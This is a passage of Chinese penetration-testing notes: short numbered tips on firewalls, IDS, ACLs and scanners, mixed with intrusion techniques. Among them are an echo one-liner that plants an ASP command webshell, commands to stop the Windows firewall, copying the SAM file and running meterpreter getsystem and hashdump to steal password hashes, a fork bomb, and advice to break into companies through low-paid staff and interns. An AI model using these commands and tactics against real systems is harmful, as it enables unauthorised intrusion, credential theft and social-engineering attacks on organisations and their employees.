9. 当防火墙被放置在外网边界,一般不会开启IDS功能,外网的攻击比较多,也比较复杂,
开启IDS可能导致防火墙的性能出现问题。一般来说,当防火墙处于信息中心边界时,可以开启IDS;而在外网边界可以使用专门的IDS或IPS设备。
10. 1Nessus是一个强大的扫描器,强大到它甚至拥有属于自己的脚本语言,称为Attack
Scripting Language(NASL)。
11. 得到目标站目录, 不能直接跨的 。 可以通过”echo
^<%execute(request(“cmd”))%^> >>X:目标目录 X.asp “或者 “copy 脚本文件 X:目标目录X.asp”像目标目录写入 webshell,或者还可以试试 type 命令
12. 12、在win下关闭防火墙 和 TCP/IP 筛选的命令:net stop policyagent & net stop
sharedaccess
13. 13、当 GetHashes 获取不到 hash 时,可以用冰刃(IceSword)把 sam 复制到
桌面(适用于Windows 2000/XP/2003/Vista操作系统)。
14. 14、一般来说,中文编码使用big5时,在写入某些数据库系统中,在“许、盖、功”这
些字体上面会发生错误。
15. :(){ :|:& };:——Linux fork炸弹,其防范的方法是使用命令“ulimit -u 200”来限制每
个用户可以使用的最大进程数量。
16. 标准ACL , 所谓标准,就是指依照标准IP协议进行过滤,而且只对数据包的源IP地
址进行控制。所以,标准ACL的应用要尽量靠近目的IP。
17. 扩展ACL应该靠近特征数据的源地址所在端口,这样可以将被阻止的数据尽快地组织
在不需传递它的网络外面。
18. 渗透一定意义上是人与人的较量,所以呢,如果你现在月薪5000那么去黑掉一个大家
伙的时候应该从月薪2000的地方入手,譬如前台,运营,客服,hr,公关之类的为佳,找程序的入口也应该找实习生开发的,找外包的 ——by wooyun@xsser
【渗透笔记】(肆)
1. 在Webshell中,如果上传文件时提示缺少对象。可以尝试写一句话,用菜刀连接之后用
菜刀上传文件。
2. 使用meterpreter的hashdump提取windows口令的哈希值:
meterpreter > getuid //获知当前权限级别
meterpreter > getsystem //提升权限
meterpreter > run hashdump